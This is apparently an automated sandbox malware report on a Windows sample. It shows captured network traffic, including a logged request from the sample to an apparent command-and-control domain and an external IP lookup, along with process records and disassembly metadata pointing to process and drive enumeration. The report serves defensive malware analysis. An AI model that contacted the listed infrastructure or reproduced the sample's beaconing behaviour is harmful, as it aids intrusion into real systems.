                                                          Data Ascii: +qHy\/M\/v\/8AbL\/U8f5\/M09f9yT38z9x\/ng+3NHyyNM7pvfzf3X+e3+eBWZ0DPLdfO\/vx\/8ATL9f60SNMsiQ\/wAH\/Px\/XAoSPdv2OX\/7a+365zTdvzI6Q4H+ql8z\/P5Vp7Ty\/H\/gAQx\/vJPL2RzJH9ol80\/uPO7\/AOOafJn93v8Auf5\/0W7qXcn3Ngx5v\/LvF5H+c1DHI+P7iR\/6r99df+Av65NHx+V
                                                          Dec 20, 2024 16:44:48.543116093 CET2472OUTData Raw: 2b 58 35 70 4f 68 44 6c 6e 4a 38 36 79 5c 2f 4e 4d 76 78 65 71 53 64 4c 46 55 33 46 74 71 61 6a 75 55 31 5c 2f 75 6e 38 50 35 69 6f 4c 32 36 6a 73 62 4f 37 76 5a 75 49 62 4f 32 6e 75 70 54 6e 48 37 75 33 69 65 56 2b 54 77 50 6c 51 38 6e 70 56 72
                                                          Data Ascii: +X5pOhDlnJ86y\/NMvxeqSdLFU3FtqajuU1\/un8P5ioL26jsbO7vZuIbO2nupTnH7u3ieV+TwPlQ8npVrVbW70C31bVfEWq+DNA8M6Z8NvhB8QIPFGqa5r8eka\/q\/x38D2HxF+GXwk8MiDwdcX+ufFrWvCV7Lq9\/ollZP4Z8Nadpuo634l8X6R4cjttaur4g4w4Z4WqZfS4gzjCZXVzWs8NltLEOp7THYm8IrD4aFOnUlVx
                                                          Dec 20, 2024 16:44:48.543170929 CET7416OUTData Raw: 68 36 73 6f 33 35 57 6a 35 44 68 66 67 7a 69 6e 6a 58 46 56 38 44 77 70 6b 65 4f 7a 33 47 59 61 4f 45 6e 57 77 32 58 30 31 56 72 77 6a 6a 38 77 77 6d 55 34 53 54 70 75 55 5a 53 56 66 4d 63 64 67 38 48 42 78 54 5c 2f 66 59 69 6b 70 57 55 72 6e 65
                                                          Data Ascii: h6so35Wj5DhfgzinjXFV8DwpkeOz3GYaOEnWw2X01Vrwjj8wwmU4STpuUZSVfMcdg8HBxT\/fYikpWUrnefCb4i6l8IviZ4E+KGjWFlqer+APFGkeLNK0\/UzONNu9R0O7jv7GDUBayQXL2T3MMX2uO2uLaeWDzI4bm2kdZ4\/1aP8AwW3\/AGh\/4fhR8ER9bLx+f5eO1r8addh0zRvh23jex+I\/wk8YeJNP+CnwR\/aI8U\/


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          3192.168.2.549742185.121.15.192803148C:\Users\user\Desktop\5ZH9uXmzGP.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 20, 2024 16:44:49.954622984 CET87OUTGET /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1
                                                          Host: home.fivetk5ht.top
                                                          Accept: */*
                                                          Dec 20, 2024 16:44:51.228024006 CET212INHTTP/1.0 503 Service Unavailable
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                          HTTPS Proxied Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.54971498.85.100.804433148C:\Users\user\Desktop\5ZH9uXmzGP.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-20 15:44:42 UTC52OUTGET /ip HTTP/1.1
                                                          Host: httpbin.org
                                                          Accept: */*
                                                          2024-12-20 15:44:43 UTC224INHTTP/1.1 200 OK
                                                          Date: Fri, 20 Dec 2024 15:44:42 GMT
                                                          Content-Type: application/json
                                                          Content-Length: 31
                                                          Connection: close
                                                          Server: gunicorn/19.9.0
                                                          Access-Control-Allow-Origin: *
                                                          Access-Control-Allow-Credentials: true
                                                          2024-12-20 15:44:43 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                                          Data Ascii: { "origin": "8.46.123.189"}


                                                          Statistics

                                                          CPU Usage

                                                          Click to jump to process

                                                          Memory Usage

                                                          Click to jump to process

                                                          High Level Behavior Distribution

                                                          Click to dive into process behavior distribution

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          General

                                                          Target ID:1
                                                          Start time:10:44:36
                                                          Start date:20/12/2024
                                                          Path:C:\Users\user\Desktop\5ZH9uXmzGP.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\5ZH9uXmzGP.exe"
                                                          Imagebase:0x140000
                                                          File size:4'485'120 bytes
                                                          MD5 hash:35E2C99A2FED28F4148EF7F4C1431DF4
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:5
                                                          Start time:10:44:50
                                                          Start date:20/12/2024
                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3148 -s 1112
                                                          Imagebase:0xef0000
                                                          File size:483'680 bytes
                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Disassembly

                                                          Reset < >

                                                            Execution Graph

                                                            Execution Coverage:0.2%
                                                            Dynamic/Decrypted Code Coverage:100%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:8
                                                            Total number of Limit Nodes:0
                                                            execution_graph 13023 6f20802 Process32FirstW 13024 6f20837 13023->13024 13025 6f30343 13026 6f30350 Process32NextW 13025->13026 13028 6f3037c 13026->13028 13029 6ef0438 13030 6ef0420 GetLogicalDrives 13029->13030 13032 6ef0456 13030->13032

                                                            Executed Functions

                                                            Function 06ED0CA7 Relevance: .2, Instructions: 192COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416564966.0000000006ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6ed0000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d903c3e948e9387f8c1802253a1d1b6230887265c93832cb403044d21380bac7
                                                            • Instruction ID: 96efdea29c105208acd2a733077454c905180f2ed7db368c40f640451a4f5164
                                                            • Opcode Fuzzy Hash: d903c3e948e9387f8c1802253a1d1b6230887265c93832cb403044d21380bac7
                                                            • Instruction Fuzzy Hash: 14316DEB20C314BDB7C2D9826B54AFB572ED2DA730B38A427F807D4502E2941F4B10B5
                                                            Function 06F2059D Relevance: 7.7, APIs: 1, Strings: 3, Instructions: 672COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416653299.0000000006F20000.00000040.00001000.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6f20000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR$PR$ZX
                                                            • API String ID: 0-1118756197
                                                            • Opcode ID: 6ae5d8e51795e430640ea24571c03a45830e2219623c553b3d92dcc58274e9ab
                                                            • Instruction ID: f29d827cadc385aa63eada3c651575d655428204d84c37f984fdaa2115f2cae4
                                                            • Opcode Fuzzy Hash: 6ae5d8e51795e430640ea24571c03a45830e2219623c553b3d92dcc58274e9ab
                                                            • Instruction Fuzzy Hash: 00D104EB18C133BDB38285456F54AFB6B6EE6D77303308426F407D6602EA940E8A4DB1
                                                            Function 06F2061D Relevance: 7.6, APIs: 1, Strings: 3, Instructions: 644COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 115 6f2061d-6f2065a 118 6f20660-6f206a5 115->118 119 6f2065b call 6f20668 115->119 123 6f206b9-6f206e1 118->123 119->118 126 6f206e7-6f206ea 123->126 127 6f206e2 call 6f206f2 123->127 128 6f206af-6f206b7 126->128 129 6f206ec-6f206ed 126->129 127->126 128->123 130 6f206ef-6f207fd 129->130 131 6f206ad-6f206ae 129->131 142 6f20812-6f20827 Process32FirstW 130->142 131->128 143 6f20837-6f20fe9 call 6f20961 call 6f20b07 call 6f20d62 call 6f20dd4 142->143
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416653299.0000000006F20000.00000040.00001000.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6f20000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR$PR$ZX
                                                            • API String ID: 0-1118756197
                                                            • Opcode ID: a8a603fa83f6b5d1cc249e5631db6e08be7445e4968cf5c035d277817d319294
                                                            • Instruction ID: b7eef32a32d224f78a76d5457a632af28e8068fb7bb10f119f20f85d017ef857
                                                            • Opcode Fuzzy Hash: a8a603fa83f6b5d1cc249e5631db6e08be7445e4968cf5c035d277817d319294
                                                            • Instruction Fuzzy Hash: E8D1D3EB18C133BDB3C285456B54AFBAB6EE6D77307308426F407D6602EA940E895DF1
                                                            Function 06F20630 Relevance: 7.6, APIs: 1, Strings: 3, Instructions: 643COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 225 6f20630-6f20635 226 6f20637-6f20644 225->226 227 6f20688-6f2068e 225->227 228 6f20652-6f20655 226->228 229 6f20646 226->229 230 6f20690-6f206a5 227->230 231 6f20656-6f2065a 228->231 229->231 232 6f206b9-6f206e1 230->232 234 6f20660-6f20680 231->234 235 6f2065b call 6f20668 231->235 238 6f206e7-6f206ea 232->238 239 6f206e2 call 6f206f2 232->239 234->230 235->234 241 6f206af-6f206b7 238->241 242 6f206ec-6f206ed 238->242 239->238 241->232 243 6f206ef-6f207fd 242->243 244 6f206ad-6f206ae 242->244 255 6f20812-6f20827 Process32FirstW 243->255 244->241 256 6f20837-6f20fe9 call 6f20961 call 6f20b07 call 6f20d62 call 6f20dd4 255->256
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416653299.0000000006F20000.00000040.00001000.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6f20000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR$PR$ZX
                                                            • API String ID: 0-1118756197
                                                            • Opcode ID: b3eacc3cf86b5202a6172839c60d4dbbea034e29d1874634796a1546c7b21867
                                                            • Instruction ID: 70c24bfcbd7dc9281600f66322a6b68fdbeb546a68df1250fe36258b8595bc08
                                                            • Opcode Fuzzy Hash: b3eacc3cf86b5202a6172839c60d4dbbea034e29d1874634796a1546c7b21867
                                                            • Instruction Fuzzy Hash: 88D1F3EB18C133BDB3C285456B54AFBAB6EE6D77307308426F407D6602EA940E895DF1
                                                            Function 06F2064C Relevance: 7.6, APIs: 1, Strings: 3, Instructions: 638COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 338 6f2064c-6f206a5 call 6f20668 345 6f206b9-6f206e1 338->345 348 6f206e7-6f206ea 345->348 349 6f206e2 call 6f206f2 345->349 350 6f206af-6f206b7 348->350 351 6f206ec-6f206ed 348->351 349->348 350->345 352 6f206ef-6f207fd 351->352 353 6f206ad-6f206ae 351->353 364 6f20812-6f20827 Process32FirstW 352->364 353->350 365 6f20837-6f20fe9 call 6f20961 call 6f20b07 call 6f20d62 call 6f20dd4 364->365
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416653299.0000000006F20000.00000040.00001000.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6f20000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR$PR$ZX
                                                            • API String ID: 0-1118756197
                                                            • Opcode ID: 3003bdf7a9811b343451317bff901307b55ae9c1c3c288c357954325ea0ac601
                                                            • Instruction ID: a1f9290f5688e09c4f3c8d7048f02fdffe159f686099e4bcaf26867d053bdb1f
                                                            • Opcode Fuzzy Hash: 3003bdf7a9811b343451317bff901307b55ae9c1c3c288c357954325ea0ac601
                                                            • Instruction Fuzzy Hash: 64D1F5EB18C133BDB3C285856B54AFB6B6EE6C67307308426F407D6602EB940E895DF1
                                                            Function 06F20674 Relevance: 7.6, APIs: 1, Strings: 3, Instructions: 637COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 447 6f20674-6f20675 448 6f206c3 447->448 449 6f20677 447->449 450 6f206c5-6f206c9 448->450 451 6f2065e-6f2066e 448->451 452 6f20678-6f206a5 449->452 454 6f206cb-6f206e1 450->454 451->452 457 6f206b9-6f206be 452->457 458 6f206e7-6f206ea 454->458 459 6f206e2 call 6f206f2 454->459 457->454 460 6f206af-6f206b7 458->460 461 6f206ec-6f206ed 458->461 459->458 460->457 462 6f206ef-6f207fd 461->462 463 6f206ad-6f206ae 461->463 474 6f20812-6f20827 Process32FirstW 462->474 463->460 475 6f20837-6f20fe9 call 6f20961 call 6f20b07 call 6f20d62 call 6f20dd4 474->475
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416653299.0000000006F20000.00000040.00001000.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6f20000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR$PR$ZX
                                                            • API String ID: 0-1118756197
                                                            • Opcode ID: 88f160607dc7685370c7b43250e05a47c629c92b4296508774b2ae92c4002f49
                                                            • Instruction ID: f221174693ed49aa5f7d1d55fcd5e2e13f173c05827db0ca4c70ba33a75ffc0b
                                                            • Opcode Fuzzy Hash: 88f160607dc7685370c7b43250e05a47c629c92b4296508774b2ae92c4002f49
                                                            • Instruction Fuzzy Hash: BFD1E3EB18D133BDB3C285456B54AF7AB6EE6C77307308426F407D6602EA940E895DF1
                                                            Function 06F20686 Relevance: 7.6, APIs: 1, Strings: 3, Instructions: 623COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 557 6f20686-6f206a5 560 6f206b9-6f206e1 557->560 563 6f206e7-6f206ea 560->563 564 6f206e2 call 6f206f2 560->564 565 6f206af-6f206b7 563->565 566 6f206ec-6f206ed 563->566 564->563 565->560 567 6f206ef-6f207fd 566->567 568 6f206ad-6f206ae 566->568 579 6f20812-6f20827 Process32FirstW 567->579 568->565 580 6f20837-6f20fe9 call 6f20961 call 6f20b07 call 6f20d62 call 6f20dd4 579->580
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416653299.0000000006F20000.00000040.00001000.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6f20000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR$PR$ZX
                                                            • API String ID: 0-1118756197
                                                            • Opcode ID: 17a8fc2950027ef9fa48e6262fe533c1c1199198e45fc834473bdc20cbf72047
                                                            • Instruction ID: a36d095beb8011571f3a4aceb2e22b103daa31ceecbbe5601dad6d39594348aa
                                                            • Opcode Fuzzy Hash: 17a8fc2950027ef9fa48e6262fe533c1c1199198e45fc834473bdc20cbf72047
                                                            • Instruction Fuzzy Hash: 6EC1D3EB18C133BDB3C285856B54AFB6B6EE6D67307308426F407D6602EB940E895DB1
                                                            Function 06F206AB Relevance: 7.6, APIs: 1, Strings: 3, Instructions: 618COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 662 6f206ab-6f206ac 663 6f206ad-6f206ae 662->663 664 6f206af-6f206e1 663->664 668 6f206e7-6f206ea 664->668 669 6f206e2 call 6f206f2 664->669 668->664 670 6f206ec-6f206ed 668->670 669->668 670->663 671 6f206ef-6f207fd 670->671 682 6f20812-6f20827 Process32FirstW 671->682 683 6f20837-6f20fe9 call 6f20961 call 6f20b07 call 6f20d62 call 6f20dd4 682->683
                                                            APIs
                                                            • Process32FirstW.KERNEL32(06F206E7,?,000048BD), ref: 06F20816
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416653299.0000000006F20000.00000040.00001000.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6f20000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID: PR$PR$ZX
                                                            • API String ID: 2623510744-1118756197
                                                            • Opcode ID: 185e878ea0a683e6ac67226f1843f976a84637a93de4d278c2115e59607d7cf3
                                                            • Instruction ID: f62f8b3cd8cd3b951ea3e7473d015e150e0703d4649749fa1891c0a65d6d95ce
                                                            • Opcode Fuzzy Hash: 185e878ea0a683e6ac67226f1843f976a84637a93de4d278c2115e59607d7cf3
                                                            • Instruction Fuzzy Hash: C8C1D2EB18C133BDB382C5856B54AFBAB6EE2D67307308426F407D6602EA944E495DF1
                                                            Function 06F206D6 Relevance: 7.6, APIs: 1, Strings: 3, Instructions: 605COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 765 6f206d6-6f206e2 call 6f206f2 767 6f206e7-6f206ea 765->767 768 6f206af-6f206e1 767->768 769 6f206ec-6f206ed 767->769 768->767 777 6f206e2 call 6f206f2 768->777 771 6f206ef-6f207fd 769->771 772 6f206ad-6f206ae 769->772 786 6f20812-6f20827 Process32FirstW 771->786 772->768 777->767 787 6f20837-6f20fe9 call 6f20961 call 6f20b07 call 6f20d62 call 6f20dd4 786->787
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416653299.0000000006F20000.00000040.00001000.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6f20000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR$PR$ZX
                                                            • API String ID: 0-1118756197
                                                            • Opcode ID: cd6bf4592dd727ad9c03b90bfab68271bd9fe1f511b9711101b65d42c2bb1c7b
                                                            • Instruction ID: b0138e7f4eaedb0ec0c5970941796d6937293a224dbbd749794f3b048cb388c2
                                                            • Opcode Fuzzy Hash: cd6bf4592dd727ad9c03b90bfab68271bd9fe1f511b9711101b65d42c2bb1c7b
                                                            • Instruction Fuzzy Hash: 5BC1D3EB18C133BDB3C285856B54AFBA76EE6D67307308426F407D6602EB940E495DB1
                                                            Function 06F20710 Relevance: 7.6, APIs: 1, Strings: 3, Instructions: 592COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 869 6f20710-6f20712 870 6f20714-6f20721 869->870 871 6f2073f-6f20745 869->871 872 6f20726-6f20732 870->872 871->872 873 6f20747-6f207fd 871->873 872->871 882 6f20812-6f20827 Process32FirstW 873->882 883 6f20837-6f20fe9 call 6f20961 call 6f20b07 call 6f20d62 call 6f20dd4 882->883
                                                            APIs
                                                            • Process32FirstW.KERNEL32(06F206E7,?,000048BD), ref: 06F20816
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416653299.0000000006F20000.00000040.00001000.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6f20000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID: PR$PR$ZX
                                                            • API String ID: 2623510744-1118756197
                                                            • Opcode ID: 5c075d01bb255ca76f3d2c960bef1e57e1c353ce92485884c410d65d190a37a8
                                                            • Instruction ID: 2e00a2aa8b5e0cad90375154d01fa2e2c114f4ddb2fbef8ac28f35f3e16ea9a2
                                                            • Opcode Fuzzy Hash: 5c075d01bb255ca76f3d2c960bef1e57e1c353ce92485884c410d65d190a37a8
                                                            • Instruction Fuzzy Hash: 4FC103EB18D133BDB38285456B54AFBAB6EE6C77307308436F407D6A02EB940E495DB1
                                                            Function 06F2073A Relevance: 7.6, APIs: 1, Strings: 3, Instructions: 574COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • Process32FirstW.KERNEL32(06F206E7,?,000048BD), ref: 06F20816
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416653299.0000000006F20000.00000040.00001000.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6f20000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID: PR$PR$ZX
                                                            • API String ID: 2623510744-1118756197
                                                            • Opcode ID: 6f661e44f646b1a7911a205d00f1eb546f4e0252e9eb46c0004405967132d3f3
                                                            • Instruction ID: 5c8b6c05339c5c05d03be9039a9f147808053e8eaf7cb292ef54a68b0f4045df
                                                            • Opcode Fuzzy Hash: 6f661e44f646b1a7911a205d00f1eb546f4e0252e9eb46c0004405967132d3f3
                                                            • Instruction Fuzzy Hash: 29C1F1EB18C133BDB3C285856B54AFBAB6EE6D77307308426F407D6602EAD40E495DB1
                                                            Function 06F2075C Relevance: 7.6, APIs: 1, Strings: 3, Instructions: 565COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • Process32FirstW.KERNEL32(06F206E7,?,000048BD), ref: 06F20816
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416653299.0000000006F20000.00000040.00001000.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6f20000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID: PR$PR$ZX
                                                            • API String ID: 2623510744-1118756197
                                                            • Opcode ID: d072e9144e7944bae845ad8ef7b46484d13681973aa7dfd4c353224a91e8afbb
                                                            • Instruction ID: ccb62921e869606decbd5fd3fe475aeb8e467d012a9b7dbc519c2709e1b0839f
                                                            • Opcode Fuzzy Hash: d072e9144e7944bae845ad8ef7b46484d13681973aa7dfd4c353224a91e8afbb
                                                            • Instruction Fuzzy Hash: 81B1D1EB18C132BDB3C285856B54AFBA76EE2D67307308436F407D6602EAD44E895DB1
                                                            Function 06F2076C Relevance: 7.6, APIs: 1, Strings: 3, Instructions: 563COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • Process32FirstW.KERNEL32(06F206E7,?,000048BD), ref: 06F20816
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416653299.0000000006F20000.00000040.00001000.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6f20000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID: PR$PR$ZX
                                                            • API String ID: 2623510744-1118756197
                                                            • Opcode ID: f0141db529f4a69ace0d5d6cefe9c4b3c50632d73ca7f1a53725d7cc93f02e88
                                                            • Instruction ID: 6001172864487334aee403fdfa5bad439be8f916641aba4ec7b5a1cfdff48778
                                                            • Opcode Fuzzy Hash: f0141db529f4a69ace0d5d6cefe9c4b3c50632d73ca7f1a53725d7cc93f02e88
                                                            • Instruction Fuzzy Hash: AEB1D0EB18C132BDB3C285856B54AFBA76EE6D67303308436F407D6602EAD40E895DB1
                                                            Function 06F207EA Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 549COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1241 6f207ea-6f207f3 1242 6f20792-6f207e5 1241->1242 1243 6f207f5-6f207f7 1241->1243 1247 6f207fd 1242->1247 1243->1242 1245 6f207f9-6f207fb 1243->1245 1245->1247 1249 6f20812-6f20827 Process32FirstW 1247->1249 1250 6f20837-6f20fe9 call 6f20961 call 6f20b07 call 6f20d62 call 6f20dd4 1249->1250
                                                            APIs
                                                            • Process32FirstW.KERNEL32(06F206E7,?,000048BD), ref: 06F20816
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416653299.0000000006F20000.00000040.00001000.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6f20000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID: PR$PR$ZX
                                                            • API String ID: 2623510744-1118756197
                                                            • Opcode ID: cf090124f7f87ef73d147d23112073e2679efa0072252d8d088e066748e5e8fc
                                                            • Instruction ID: 00cc74999453857ac5b19e7e4aad483763995d493c05709c338c04629981a9e2
                                                            • Opcode Fuzzy Hash: cf090124f7f87ef73d147d23112073e2679efa0072252d8d088e066748e5e8fc
                                                            • Instruction Fuzzy Hash: BAB101EB18C133BDB3C285856B54AFBA76EE2D67303308426F407D6602EA940E4A5DF1
                                                            Function 06F207BE Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 523COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1332 6f207be-6f207c6 1333 6f207c8-6f207cc 1332->1333 1334 6f207cd-6f207fd 1332->1334 1333->1334 1337 6f20812-6f20827 Process32FirstW 1334->1337 1338 6f20837-6f20fe9 call 6f20961 call 6f20b07 call 6f20d62 call 6f20dd4 1337->1338
                                                            APIs
                                                            • Process32FirstW.KERNEL32(06F206E7,?,000048BD), ref: 06F20816
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416653299.0000000006F20000.00000040.00001000.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6f20000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID: PR$PR$ZX
                                                            • API String ID: 2623510744-1118756197
                                                            • Opcode ID: 5fa0d9fd73abf0d5a6991bffcb9ab4e666ab685988d218da21c4a65f6f48d6fd
                                                            • Instruction ID: 4e2d9b36746816365c60708e6fb6f715caa0f8394af3f9fe9d2d67555180eb1f
                                                            • Opcode Fuzzy Hash: 5fa0d9fd73abf0d5a6991bffcb9ab4e666ab685988d218da21c4a65f6f48d6fd
                                                            • Instruction Fuzzy Hash: 3FB1E1EB18C133BDB3C2C5856B54AFBA76EE2D67303308426F407D6602EA944E895DF1
                                                            Function 06F207D4 Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 511COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • Process32FirstW.KERNEL32(06F206E7,?,000048BD), ref: 06F20816
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416653299.0000000006F20000.00000040.00001000.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6f20000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID: PR$PR$ZX
                                                            • API String ID: 2623510744-1118756197
                                                            • Opcode ID: be44194eb7fd650370f729db105fd091f5f9b09c9ff46a667e0f0bb16f97589d
                                                            • Instruction ID: efed6960afc038b70bcc60b3e31b9ee3a129f8e427de5d620de8241f87313aac
                                                            • Opcode Fuzzy Hash: be44194eb7fd650370f729db105fd091f5f9b09c9ff46a667e0f0bb16f97589d
                                                            • Instruction Fuzzy Hash: A0A1D0EB58C133BDB3C2C5856B54AFBA76EE2D67303308426F407D6602EA944E895DF1
                                                            Function 06F20802 Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 506COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32FirstW.KERNEL32(06F206E7,?,000048BD), ref: 06F20816
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416653299.0000000006F20000.00000040.00001000.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6f20000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID: PR$PR$ZX
                                                            • API String ID: 2623510744-1118756197
